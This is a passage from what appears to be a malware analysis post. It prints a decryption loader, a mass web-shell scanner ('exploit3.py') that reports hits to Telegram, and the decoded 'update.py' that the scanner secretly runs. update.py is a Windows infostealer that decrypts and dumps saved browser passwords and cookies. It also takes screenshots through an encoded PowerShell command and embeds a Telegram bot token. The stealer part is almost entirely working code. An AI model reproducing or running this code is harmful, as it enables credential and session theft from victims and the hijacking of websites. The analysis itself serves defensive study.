VGaWJuUkF2YUgzZUs2TEtaS3VlYXVvLUpNd0MyU0NTOUViZDVfYWIyS1V2MDAwTGlyQ2FnT1dabVNMUEpDUklFdW1DRDBocmR6UFN5bk5jRWpnV2RDZ2ZrSHdaRXh2ZTBQZ2Iwb3VsTW1Vb2VyTzhsblJiYi0yT2Jwa2ZfVUU3OWduOVZOUG1SSnNUTXZVVmZ1VEFDM2xUajFGUGh4cnZITDJHSnFYMUxVVl91cHdmUnFfNGhzSFM2bDVWWl92aTZPTktxTWhLM1pvTFBWSUJOYjJ5MFRJc25BQ3g0dzByLXllU0VrOGFiT05DMU02UUk3Z0R4alBUUGFDWmhwanhkMUpiZmVJSHMwZFhqWk84SUcxaHFmT3RES3Vxb180VUtrZTducTMtRUVFd01pbVBYYklNU0U3N25BVC1penJDOGtDaDd3TXMzaS1fRFVlS29wMHdUZGZYcWFGU2d6SDBzSDZVLUEyUFZ5YVYyZWxONU9fZXJWZ28xSVhHMmU5cUhWdndaanNJVFFoZ1UtQ3RVdHd4aDVLT3diNGpzbE84VXRONDNQSWRaUG9yb0Y5TTA2eUx0dFlNS3FjMWpwcG54YVdiU0hzWm9TM3k0SHpGMnBtX21vTmREOF9iSjd5RGs0bm5Pb0pIMjB3OGlxTzBaMGlUWmljNnRldkRYSnRMbjIwWVo4ek5WX3NPakhZNG04QVVwM29oLWN2c1lUeE5DVFhrRVNRWkp0bkk1S0JGMGZfU1pNT1ZZWWh1ekNzRkZORno2bG5fUHMyajFwV3ROUUdRd2lRQ0trWVNOZmxhU0hxUnBzOXlIQ0pRTmdnZ2ZqTXV3MmV5cVo5ckM0WEhnNXhlSVg0Y2ladS1DWVVjNnRDUlJVbnBrVVNrR09hNmNmVkp3S1l1WEZkNUpaOWZvT2hlUXg5cE5lSDhUd2xoMW9yUnVIVkdUWE5NNGE3d0ROVmdpd0N6OVZaWkRrcXRrbXBBazA4NVJNV29lWk5pQlY5ZEJ5Z2gtMXhlanB6RFl2Y1lWZDJZdXhCdUZYZjRhTnFxZlNUeTBVY1A3MkM2R09vbmVzVTYwMkJDdUtvNUtuZXFwcXBaQlZKdExhaGZjTkIzNG9kdGowRXhWM0xfN1VWZlJxc2hJcEswdnRoeWtTaVZQaUR4dllKTXM4Um5IcGsyUDd5SUVQMk1MNTd1TzZYVkVXUjhUdzFUU1Q3ZFlKVXBVbS1BY2FHY1RSdXRiQjV1ajVDQ0k4ZWViYnRWZlhmNGJWdEx6U096SG1tbXNEbXRsMkFMdkVsYUFwYjh0WXREelZSYTY3UEwzUWVaaHJ0TEUzTUtpVHZ4bTJ2MzNKeXZxZjhKOFRGT3AzYTluSDZ2NS1WdzZLLUxuVGtRZzh4ckFBUnNHNDZDa1k0bHJfMGQtN19OZjJWWVJGeF9WLUtQd25lVnZjZVozWTR2Q3hvRkQyay1idWc0eWVacXRFY0hsQlM4RXhGT1hJbklVd0JWQ3JCcS05aU1BdFR6ekt5eGRTcXQzbExhdEpDM2hmMWpNLUFiZEhrNndtRzc5MG1EdzhZalFYLVMxaC0yT1VxaXc4QjUzWmY4SzBPektSSUxELXk2QjFxdzNTcDczam1zdktLQ3E4UTQzTTVTSGRRMTg4WUVTWXpiRUl4SnJOcFRRcFJvOHVJVkdvd2dfYWNscjBTRTZJOG5XanJSV0VnMUFxdXdNd21zWVpVSE5FWGtEZVBjOGlnVW1EQ2QwQlhhMWV0eEFPREZwekJLVzEtOGNTbURkNDMtMTJ5a0RsazRuU2lrREswX0lLUWlMRXNQY3c5Ym83SmYxbktFQmNya1ZyNmF6d1YyeV9TaXVObTl0WTFQOUxsSlBtMkVJZ2h1a0MxS00yUXhENnd1dl93bk5qcGw4cFEybGJHRE1SRWp2ODN4dWM1dVBJWC1yUmN1ZTBuems4ZGI2RXZla0N2R0RlTnNCUUtkREJ1XzZPYy1NdEUtQ2gyeElwSHpqV0k2RGU3MWg5QXVsQ3NmbFo3TXFsdXlkaE02RHRKdE0tWmExT2Vrak9uUmxmX2M5NkJiNUlGa3JGMGMxMVk1VExUT0Z0U0FjT2RlV0ZMNHpWNDZiSEo2N1NaY1RQMzVjakdFcE1DamNFcUFhdlhVaGJwM2xIQUhPMi1aRU41Rk9sY3RPamtaNFJnaGgyNmg0RXpDR0k0WDV3VzdReEowQ0MzSHZNS0ZNdVNqVjZNeE1qR1lCeTFKYzJXenpaOG8xSFlJYjRLTjRTMFNtUzUzSFU5Q1I1YmNZLUpnSXBYNVJzMU04NklhS210S3hfSTFkVjlJMGZzQ1RGaXViaDFFaU5FMWUy"
encrypted_code = base64.b64decode(encoded_code)
s = [b'zTskoYGm68VrSiOM6J9W0PqyKTfSyraM0NydVmJvM_k=', b'pcD23bRQTL1MqLS84NdPsiPdYJlwbTaal6JmulzTq4k=', b'9EBQNDjmy0rGXCbVgVnrgFFsAHk4Ye1M8y1GSIx9CPY=', b'663RnK5l0MQzewfpAQfYhJbL3p7ZRoR-j7I3DkXiUIk=', b'I5Arxkgfo2E56VBVctFjJ-pFkeBbQg6QXMuG-gNgqq4=', b'eXP1sKfkTE9PNkWR8rA9jzJqun80yMYPrzMMi65JQpw=', b'56S9Sv7zUPL71w6N2OTSwxvFl_a-5zvsN6rxQI97UWU=', b'gZcRMaVftMg_F9E4tNQ_etAR7_PKT_vVfWwWkMSxDQc=', b'-XmaKL4uo4p0gM5ARQZtxjZ_5ecK1w53AEkWuiWDIzQ=', b'ikNfBtrrX-9EBI3iKzWnBJW5wNNvi8rM4oT9BLqDJNw=', b'uEikHaHAX1B20aB_bcQwUA0aO21Ai-rgYAqGfKxHKJA=', b'deoHTwNvwTOuQjoy5oh9jN_ZQlLbVCvwI47D3sQt8UA=', b'xuaD7BqwreniKZAvBO38MO250oO40HXboxhU8--6YQ0=', b'X5GfY_zukIDPKxyzmMYFkps-Av8Ao2TQDPmckrjb3ZQ=', b'CAOD7XSW4e-ON33uz5_8h6RZhorDlKg798e1RcEYSlo=', b'dMphwlwO6Qh_FCdbMzseoZsWkQWPFtGx8VSiFAN2SSo=', b'q4NfcRieLIKnyBwFEhUxZcR_8A3BFS_n_cIE8sFX8a4=', b'hLfAPR06xuo545qJlzlYko5f9KKuXOBrCBNgzruTV14=']
for key in s:
try:
decrypted_code = hXRGDGCPTrRvbzwaUlFbmQCoD8OCY4rjYCOxN5(key.decode("utf-8")).decrypt(encrypted_code)
break
except Exception as e:
pass
decompressed_code = zlib.decompress(decrypted_code).decode('utf-8')
print(decompressed_code)
And I got the third payload:
exploit3.py
from colorama import Fore, Back, Style, init
from configparser import ConfigParser
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from multiprocessing.dummy import Pool
from platform import system
from queue import Queue
from re import findall as reg
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from termcolor import colored
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
import subprocess
import colorama
import concurrent.futures
import getpass
import json
import multiprocessing
import os
import platform
import random
import re
import requests
import signal
import smtplib
import socket
import sys
import threading
import time
import urllib.request
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
r = Fore.YELLOW + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL
bl = Fore.BLUE
wh = Fore.WHITE
gr = Fore.GREEN
red = Fore.RED
res = Style.RESET_ALL
yl = Fore.YELLOW
blc = Fore.BLACK
bg_gr = Back.GREEN
bg_red = Back.RED
bg_wh = Back.WHITE
def send_telegram_message(chat_id, bot_token, message):
try:
url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
params = {'chat_id': chat_id, 'text': message}
response = requests.get(url, params=params)
return response.json()
except Exception as e:
print(f"Error sending message to Telegram: {e}")
return {'ok': False}
def read_backdoors():
try:
with open('exploit-cs.json', 'r') as backdoor_file:
backdoor_data = json.load(backdoor_file)
return backdoor_data.get("backdoors", [])
except FileNotFoundError:
print('Backdoor configuration file not found.')
sys.exit(1)
except Exception as backdoor_err:
print('Error reading backdoor configuration:', backdoor_err)
sys.exit(1)
def read_config():
try:
with open('config.json', 'r') as config_file:
config_data = json.load(config_file)
return config_data
except Exception as config_err:
print('Error reading configuration:', config_err)
sys.exit(1)
def exploit(url, chat_id, bot_token, backdoors):
try:
head = {'User-agent': 'Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36'}
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
for backdoor in backdoors:
req = requests.get(url + backdoor['path'], headers=head, timeout=15).text
if backdoor['expected_string'] in req:
vuln_url = url + backdoor['path'] + '#' + backdoor['vuln_name']
print(colored(f'[Vuln]: {vuln_url}', 'green'))
vuln_message = f'[Vuln]: {vuln_url}'
response = send_telegram_message(chat_id, bot_token, vuln_message)
if response['ok']:
print(colored('Shell Message Telegram Successfully', 'cyan'))
else:
print(colored('Shell Message Telegram Failed', 'red'))
with open('expl0it-shell.txt', 'a') as f:
f.write(vuln_url + '\n')
else:
print(colored(f"[Not Vuln]: {url}", 'red'))
except requests.exceptions.Timeout:
print(colored(f"[Error Timeout]: {url}", 'blue'))
except Exception:
domain = url.split('//')[-1].split('/')[0]
print(colored(f"[Error]: {domain}", 'blue'))
def pr():
try:
list_file = input(' List : ')
config_data = read_config()
chat_id = config_data["shell-f_config"]["chatid"]
bot_token = config_data["shell-f_config"]["tokenbot"]
backdoors = read_backdoors()
try:
with open(list_file, 'r') as url_file:
url_list = url_file.read().splitlines()
thread_count = min(len(url_list), 150)
pool = Pool(thread_count)
pool.starmap(exploit, [(url, chat_id, bot_token, backdoors) for url in url_list])
except Exception as file_err:
print('Error reading URL list:', file_err)
except KeyboardInterrupt:
print('Process interrupted.')
except Exception as main_err:
print('An unexpected error occurred:', main_err)
finally:
main_menu()
def remove_duplicate_lines(input_file, output_file):
try:
total_lines = sum(1 for _ in open(input_file, 'r', encoding='utf-8'))
with open(input_file, 'r', encoding='utf-8') as result:
uniqlines = set(result.readlines())
with open(output_file, 'w', encoding='utf-8') as output:
processed_lines = 0
for line in uniqlines:
output.write(line)
processed_lines += 1
progress = processed_lines / total_lines
print_progress_bar(progress)
print(f'\nDuplicates removed and saved to {output_file}')
except FileNotFoundError:
print('Input file not found')
def print_progress_bar(progress):
bar_length = 40
block = int(round(bar_length * progress))
progress_percent = progress * 100
bar = '\033[32m' + '=' * block + '\033[0m' + '-' * (bar_length - block)
sys.stdout.write(f'\r[{bar}] {progress_percent:.1f}%')
sys.stdout.flush()
def clean_web():
try:
list_file = input('List: ')
output_file = list_file.replace('.txt', '_clean.txt')
remove_duplicate_lines(list_file, output_file)
except KeyboardInterrupt:
print('\nOperation aborted')
except Exception as e:
print('\nAn error occurred:', str(e))
finally:
main_menu()
def main_menu():
os.system('cls' if os.name == 'nt' else 'clear')
print("""
Telegram Channel: https://t.me/xeonthread | Admin: @kevinxeon
+ Inbox qua telegram để liên hệ mua tool và API tạo số lượng lớn website
[MENU]
[1] SHELLS/UPLOADERS EXPLOIT(x)
[0] Exit
""")
choice = input("Select number : ")
if choice == "1":
print("""
Enjoy
Contact: @kevinxeon
""")
pr()
elif choice == "0":
sys.exit(0)
elif choice.strip() == "":
main_menu()
else:
print("Invalid choice. Please select a valid option.")
main_menu()
if __name__ == "__main__":
subprocess.run(["python", "update.py"])
main_menu()
There are 9 functions and their mechanisms are very clear:
- send_telegram_message(chat_id, bot_token, message): Sends a message to a Telegram chat using the bot token and chat ID, utilizes the Telegram Bot API.
- read_backdoors(): Reads and parses a exploit-cs.json file that contains a list of backdoors (paths and vulnerabilities) to check during the exploit process.
- read_config(): Reads a config.json file that contains configuration data, including the Telegram bot token and chat ID for notifications.
- exploit(url, chat_id, bot_token, backdoors): This function takes a URL and iterates through the list of backdoor paths to check for vulnerabilities. If a vulnerability is found (based on expected content in the response), it sends a notification to Telegram and saves the result in a local file (expl0it-shell.txt). If the request times out or fails, it handles errors gracefully by printing appropriate error messages.
- pr(): The core process that starts when option 1 is selected in the menu. It will reads a list of URLs from a file and uses a thread pool to test each URL with the exploit() function also retrieves configurations and backdoor details for the exploit process.
- remove_duplicate_lines(input_file, output_file): Utility function to remove duplicate lines from a file, print progress during the process using a progress bar.
- print_progress_bar(progress): Prints a progress bar in the terminal based on the progress percentage during file operations (used in remove_duplicate_lines()).
- clean_web(): Calls remove_duplicate_lines() to clean a list of URLs by removing duplicates and saving to a new file.
- main_menu(): Displays the main menu and handles user input to select different operations. The options are: run the pr() function to start the vulnerability exploitation process or exit the program.
- if __name__ == “__main__“: Executes the script, first running update.py (likely to check for updates) and then presenting the main menu.
update.py
In this file it’s same with exploit.py so I will paste the final result after all steps same with the first case:
import base64
import os
import subprocess
import json
import random
import shutil
import sqlite3
import time
import ctypes
from datetime import datetime
import requests
import winreg
from Crypto.Cipher import AES
from threading import Thread
from ctypes import wintypes
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib3 import PoolManager, HTTPResponse, disable_warnings as disable_warnings_urllib3
disable_warnings_urllib3()
APPDATA:str = os.getenv("APPDATA")
LOCALAPPDATA:str = os.getenv("LOCALAPPDATA")
TAPI: str = "7460905724:AAFXWP_DbxYFZ1_6HCOGiqd0AOR-uFjweoo"
TCHATID: str = "-1002239828093"
class ChoriumBrowsers:
encryptionKey: bytes = None
BrowserPath: str = None
LoginFilePaths: str = None
savePath: str = None
oldPath: str = None
def __init__(self, browserPath: str) -> bool:
if("Opera" in browserPath):
self.oldPath = browserPath
browserPath = os.path.join(APPDATA, browserPath)
else:
self.oldPath = browserPath
browserPath = os.path.join(LOCALAPPDATA, browserPath)
self.BrowserPath = browserPath
self.encryptionKey = self.GetEncryptionKey()
@staticmethod
def Check(browserPath: str) -> bool:
if("Opera" in browserPath):
browserPath = os.path.join(APPDATA, browserPath)
else:
browserPath = os.path.join(LOCALAPPDATA, browserPath)
if not os.path.exists(path=browserPath):
return False
return True
def GetEncryptionKey(self) -> bytes:
if self.encryptionKey is not None:
return self.EncryptionKey
else:
localStatePath = os.path.join(self.BrowserPath, "Local State")
if os.path.isfile(localStatePath):
for i in ["chrome", "brave", "opera", "edge", "comodo", "epic", "iridium", "opera"]:
Utility.TaskKill(i)
with open(localStatePath, encoding= "utf-8", errors= "ignore") as file:
jsonContent: dict = json.load(file)
encryptedKey: str = jsonContent["os_crypt"]["encrypted_key"]
encryptedKey = base64.b64decode(encryptedKey.encode())[5:]
self.EncryptionKey = Syscalls.CryptUnprotectData(encryptedKey)
return self.EncryptionKey
else:
return None
def GetLoginPaths(self,browserPath: str):
loginFilePaths = list()
for root, _, files in os.walk(browserPath):
for file in files:
if file.lower() == "login data":
filepath = os.path.join(root, file)
loginFilePaths.append(filepath)
return loginFilePaths
#name = [Google_Chrome]Profile1_Password.txt
def GetPasswords(self, savePath: str):
browserName = self.oldPath.split("\\")[0] + "_" + self.oldPath.split("\\")[1]
for path in self.GetLoginPaths(self.BrowserPath):
name = f"[{browserName}]"
if "Default" in path:
name += "Default_Password.txt"
else:
a: list = path.split("\\")
name += a[len(a)-2] + "_Password.txt"
while True:
tempfile = os.path.join(os.getenv("temp"), Utility.GetRandomString(10) + ".db")
if not os.path.isfile(tempfile):
break
try:
for i in ["chrome", "brave", "opera", "edge", "comodo", "epic", "iridium", "opera"]:
Utility.TaskKill(i)
shutil.copy(path, tempfile)
except Exception:
continue
db = sqlite3.connect(tempfile)
db.text_factory = lambda b : b.decode(errors= "ignore")
cursor = db.cursor()
f = None
try:
results = cursor.execute("SELECT origin_url, username_value, password_value FROM logins").fetchall()
f = open(savePath+ name, mode="a+", encoding="utf8")
for url, username, password in results:
password = self.Decrypt(password, self.encryptionKey)
f.write(f"URL: {str(url)}\nUsername: {str(username)}\nPassword: {str(password)}\n")
Counter.PasswordCount +=1
f.close()
if(os.path.getsize(savePath + name) <= 0):
os.remove(savePath+name)
except Exception as e:
print(e)
print("dang setup tool")
def Decrypt(self, buffer: bytes, key: bytes):
version = buffer.decode(errors="ignore")
if(version.startswith(("v10", "v11"))):
iv = buffer[3:15]
cipherText = buffer[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(cipherText)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
else:
return str(Syscalls.CryptUnprotectData(buffer))
#======================== COOKIES =================================
def GetCookiesPath(self, browserPath: str):
cookiesFilePaths = list()
for root, _, files in os.walk(self.BrowserPath):
for file in files:
if file.lower() == "cookies":
filepath = os.path.join(root, file)
cookiesFilePaths.append(filepath)
return cookiesFilePaths
def GetCookies(self, savePath: str):
browserName = self.oldPath.split("\\")[0] + "_" + self.oldPath.split("\\")[1]
for path in self.GetCookiesPath(self.BrowserPath):
name = f"[{browserName}]"
if "Default" in path:
name += "Default_Cookies.txt"
else:
a = path.split("\\")
name += a[len(a)-3] + "_Cookies.txt"
while True:
tempfile = os.path.join(os.getenv("temp"), Utility.GetRandomString(10) + ".tmp")
if not os.path.isfile(tempfile):
break
try:
for i in ["chrome", "brave", "opera", "edge", "comodo", "epic", "iridium", "opera"]:
Utility.TaskKill(i)
shutil.copy(path, tempfile)
except:
continue
db = sqlite3.connect(tempfile)
db.text_factory = lambda b : b.decode(errors= "ignore")
cursor = db.cursor()
try:
results = cursor.execute("SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies").fetchall()
f = open(savePath + name, "a+", encoding="utf8")
for host, name, path, cookie, expiry in results:
cookie = self.Decrypt(cookie, self.encryptionKey)
flag1 = "FALSE" if expiry == 0 else "TRUE"
flag2 = "FALSE" if str(host).startswith(".") else "TRUE"
if host and name and cookie:
f.write(f"{host}\t{flag1}\t{path}\t{flag2}\t{expiry}\t{name}\t{cookie}\n")
Counter.CookiesCount += 1
f.close()
if(os.path.getsize(savePath + name) <= 0):
os.remove(savePath+name)
except Exception:
pass
print("xin chao, cho mot lát ")
class Counter:
CookiesCount: int = 0
PasswordCount: int = 0
FilesCount: int = 0
WalletsCount: int = 0
TelegramSessionsCount: int = 0
class Utility:
@staticmethod
def GetRandomString(length: int = 5, invisible: bool = False): # Generates a random string
if invisible:
return "".join(random.choices(["\xa0", chr(8239)] + [chr(x) for x in range(8192, 8208)], k= length))
else:
return "".join(random.choices("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", k= length))
@staticmethod
def TaskKill(*tasks: str) -> None: # Tries to kill given processes
tasks = list(map(lambda x: x.lower(), tasks))
out = (subprocess.run('tasklist /FO LIST', shell= True, capture_output= True).stdout.decode(errors= 'ignore')).strip().split('\r\n\r\n')
for i in out:
i = i.split("\r\n")[:2]
try:
name, pid = i[0].split()[-1], int(i[1].split()[-1])
name = name [:-4] if name.endswith(".exe") else name
for task in tasks:
if task in name.lower():
subprocess.run('taskkill /F /PID %d' % pid, shell= True, capture_output= True)
except Exception:
pass
@staticmethod
def GetInkTarget(path_ink: str):
target = None
if os.path.isfile(path_ink):
output = subprocess.run('wmic path win32_shortcutfile where name="%s" get target /value' % os.path.abspath(path_ink).replace("\\", "\\\\"), shell= True, capture_output= True).stdout.decode()
if output:
for line in output.splitlines():
if line.startswith("Target="):
temp = line.lstrip("Target=").strip()
if os.path.exists(temp):
target = temp
break
return target
@staticmethod
def GetLnkFromStartMenu(app: str):
shortcutPaths = []
startMenuPaths = [
os.path.join(os.environ["APPDATA"], "Microsoft", "Windows", "Start Menu", "Programs"),
os.path.join("C:\\", "ProgramData", "Microsoft", "Windows", "Start Menu", "Programs")
]
for startMenuPath in startMenuPaths:
for root, _, files in os.walk(startMenuPath):
for file in files:
if file.lower() == "%s.lnk" % app.lower():
shortcutPaths.append(os.path.join(root, file))
return shortcutPaths
class Syscalls:
@staticmethod
def CreateMutex(mutex: str) -> bool:
kernel32 = ctypes.windll.kernel32
mutex = kernel32.CreateMutexA(None, False, mutex)
return kernel32.GetLastError() != 183
@staticmethod
def CryptUnprotectData(encrypted_data: bytes, optional_entropy: str= None) -> bytes:
class DATA_BLOB(ctypes.Structure):
_fields_ = [
("cbData", ctypes.c_ulong),
("pbData", ctypes.POINTER(ctypes.c_ubyte))
]
pDataIn = DATA_BLOB(len(encrypted_data), ctypes.cast(encrypted_data, ctypes.POINTER(ctypes.c_ubyte)))
pDataOut = DATA_BLOB()
pOptionalEntropy = None
if optional_entropy is not None:
optional_entropy = optional_entropy.encode("utf-16")
pOptionalEntropy = DATA_BLOB(len(optional_entropy), ctypes.cast(optional_entropy, ctypes.POINTER(ctypes.c_ubyte)))
if ctypes.windll.Crypt32.CryptUnprotectData(ctypes.byref(pDataIn), None, ctypes.byref(pOptionalEntropy) if pOptionalEntropy is not None else None, None, None, 0, ctypes.byref(pDataOut)):
data = (ctypes.c_ubyte * pDataOut.cbData)()
ctypes.memmove(data, pDataOut.pbData, pDataOut.cbData)
ctypes.windll.Kernel32.LocalFree(pDataOut.pbData)
return bytes(data)
raise ValueError("Invalid encrypted_data provided!")
class Paths:
browserPaths = [
os.path.join("Google","Chrome","User Data"),
os.path.join("Chromium","User Data"),
os.path.join("Thorium","User Data"),
os.path.join("Google(x86)","Chrome","User Data"),
os.path.join("Google","Chrome SxS","User Data"),
os.path.join("MapleStudio","ChromePlus","User Data"),
os.path.join("Iridium","User Data"),
os.path.join("7Star","7Star","User Data"),
os.path.join("CentBrowser","User Data"),
os.path.join("Chedot","User Data"),
os.path.join("Vivaldi","User Data"),
os.path.join("Kometa","User Data"),
os.path.join("Elements Browser","User Data"),
os.path.join("CryptoTab Browser","User Data"),
os.path.join("Epic Privacy Browser","User Data"),
os.path.join("uCozMedia","Uran","User Data"),
os.path.join("Fenrir Inc","Sleipnir5","setting","modules","ChromiumViewer"),
os.path.join("CatalinaGroup","Citrio","User Data"),
os.path.join("Coowon","Coowon","User Data"),
os.path.join("Liebao","User Data"),
os.path.join("QIP Surf","User Data"),
os.path.join("Orbitum","User Data"),
os.path.join("Comodo","Dragon","User Data"),
os.path.join("Maxthon3","User Data"),
os.path.join("K-Melon","User Data"),
os.path.join("Amigo","User Data"),
os.path.join("Torch","User Data"),
os.path.join("Sputnik","User Data"),
os.path.join("DCBrowser","User Data"),
os.path.join("UR Browser","User Data"),
os.path.join("Slimjet","User Data"),
os.path.join("Opera Software","Opera Stable"),
os.path.join("Opera Software","Opera GX Stable"),
os.path.join("BraveSoftware","Brave-Browser","User Data"),
os.path.join("Yandex","YandexBrowser","User Data"),
os.path.join("Microsoft","Edge","User Data"),
os.path.join("360Browser","Browser","User Data"),
os.path.join("CocCoc","Browser","User Data")
]
isRun = False
@staticmethod
def kill():
while Paths.isRun:
for i in ["chrome", "brave", "opera", "edge"]:
Utility.TaskKill(i)
time.sleep(0.2)
def Steal(savePath: str):
os.chdir(savePath)
command = "JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" # Unicode encoded command
if subprocess.run(["powershell.exe", "-NoProfile", "-ExecutionPolicy", "Bypass", "-EncodedCommand", command], shell=True, capture_output=True, cwd= savePath + "\\").returncode == 0:
#print(1)
pass
saveBrowserCookies = savePath +"\\Browsers Data\\Cookies\\"
saveBrowserPasswords = savePath + "\\Browsers Data\\Passwords\\"
